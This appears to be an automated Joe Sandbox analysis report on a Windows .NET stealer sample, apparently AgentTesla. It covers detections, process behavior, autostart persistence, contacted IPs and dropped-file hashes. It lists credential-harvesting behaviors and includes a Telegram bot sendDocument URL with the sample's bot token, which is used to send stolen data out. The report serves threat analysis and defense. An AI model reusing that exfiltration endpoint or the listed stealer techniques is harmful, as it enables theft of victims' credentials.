                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Hidden Files and Directories                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                System Network Configuration Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830847 Sample: PSFBGrvmxy.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 55 api4.ipify.org 2->55 57 api.telegram.org 2->57 59 api.ipify.org 2->59 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Yara detected Telegram RAT 2->75 77 5 other signatures 2->77 8 PSFBGrvmxy.exe 1 8 2->8         started        12 Vlrvln.exe 4 2->12         started        14 kDPmkTm.exe 4 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 49 C:\Users\user\AppData\Roaming\...\Vlrvln.exe, PE32 8->49 dropped 51 C:\Users\user\...\Vlrvln.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\...\PSFBGrvmxy.exe.log, ASCII 8->53 dropped 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->91 93 May check the online IP address of the machine 8->93 95 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->95 97 Creates multiple autostart registry keys 8->97 18 PSFBGrvmxy.exe 17 5 8->18         started        23 powershell.exe 16 8->23         started        99 Multi AV Scanner detection for dropped file 12->99 101 Machine Learning detection for dropped file 12->101 103 Encrypted powershell cmdline option found 12->103 25 Vlrvln.exe 12->25         started        27 powershell.exe 12->27         started        29 Vlrvln.exe 12->29         started        105 Injects a PE file into a foreign processes 14->105 31 powershell.exe 14->31         started        33 kDPmkTm.exe 14->33         started        35 powershell.exe 16->35         started        signatures6 process7 dnsIp8 61 api4.ipify.org 64.185.227.155, 443, 49696 WEBNXUS United States 18->61 63 api.telegram.org 149.154.167.220, 443, 49697, 49700 TELEGRAMRU United Kingdom 18->63 65 api.ipify.org 18->65 45 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->45 dropped 47 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->47 dropped 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->79 81 Tries to steal Mail credentials (via file / registry access) 18->81 83 Creates multiple autostart registry keys 18->83 37 conhost.exe 23->37         started        67 173.231.16.76, 443, 49698 WEBNXUS United States 25->67 69 api.ipify.org 25->69 85 Tries to harvest and steal browser information (history, passwords, etc) 25->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->87 89 Installs a global keyboard hook 25->89 39 conhost.exe 27->39         started        41 conhost.exe 31->41         started        43 conhost.exe 35->43         started        file9 signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PSFBGrvmxy.exe67%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                PSFBGrvmxy.exe57%VirustotalBrowse
                PSFBGrvmxy.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe67%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe67%ReversingLabsByteCode-MSIL.Trojan.CrypterX

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                15.2.Vlrvln.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://api.telegram.org40%URL Reputationsafe
                https://urn.to/r/sds_see0%URL Reputationsafe
                http://james.newtonking.com/projects/json0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api4.ipify.org
                		64.185.227.155
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    api.ipify.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high
                        https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgPSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org4PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.orgPSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.newtonsoft.com/jsonschemakDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.newtonsoft.com/jsonkDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.nuget.org/packages/Newtonsoft.Json.BsonPSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://urn.to/r/sds_seePSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://api.telegram.orgPSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://james.newtonking.com/projects/jsonVlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          		api.telegram.orgUnited Kingdom
                                          		62041TELEGRAMRUfalse
                                          64.185.227.155
                                          		api4.ipify.orgUnited States
                                          		18450WEBNXUSfalse
                                          173.231.16.76
                                          		unknownUnited States
                                          		18450WEBNXUSfalse

                                          General Information

                                          Joe Sandbox Version:37.0.0 Beryl
                                          Analysis ID:830847
                                          Start date and time:2023-03-20 18:30:48 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 12m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:PSFBGrvmxy.exe
                                          Original Sample Name:c4b59f8e80a1289b9202a33da41d7d94.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@25/17@11/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 29
                                          • Number of non-executed functions: 9
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          18:31:57API Interceptor157x Sleep call for process: powershell.exe modified
                                          18:32:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Vlrvln "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                          18:32:27API Interceptor732x Sleep call for process: PSFBGrvmxy.exe modified
                                          18:32:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                          18:32:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Vlrvln "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                          18:32:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                          18:33:38API Interceptor7x Sleep call for process: Vlrvln.exe modified
                                          18:33:53API Interceptor111x Sleep call for process: kDPmkTm.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.220widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                            Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                              https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                    Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                      New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                        PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                          PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                            PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                              FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                  EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                    NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                      2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                        iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                            YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                  • api.ipify.org/
                                                                                  aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                  • api.ipify.org/
                                                                                  M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                  • api.ipify.org/
                                                                                  WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=wef
                                                                                  XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                  • api.ipify.org/
                                                                                  xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=wef
                                                                                  8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=wef
                                                                                  fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=wef
                                                                                  file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=wef
                                                                                  48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                  • api.ipify.org/?format=qwd

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  api4.ipify.orgSmh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.237.62.211
                                                                                  cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 173.231.16.76
                                                                                  g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 173.231.16.76
                                                                                  New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.237.62.211
                                                                                  TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.237.62.211
                                                                                  REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 104.237.62.211
                                                                                  eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.237.62.211
                                                                                  yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 173.231.16.76
                                                                                  DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 64.185.227.155
                                                                                  FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                  • 104.237.62.211

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TELEGRAMRUwidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                  • 149.154.167.99

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0ewidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  setup.exeGet hashmaliciousXmrigBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76
                                                                                  REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  • 64.185.227.155
                                                                                  • 173.231.16.76

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeNew_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                    C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeNew_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PSFBGrvmxy.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1459
                                                                                      Entropy (8bit):5.3420905847574325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                      MD5:FB4B7720101F874710FF986326F7980F
                                                                                      SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                      SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                      SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vlrvln.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1459
                                                                                      Entropy (8bit):5.3420905847574325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                      MD5:FB4B7720101F874710FF986326F7980F
                                                                                      SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                      SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                      SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                      Malicious:false
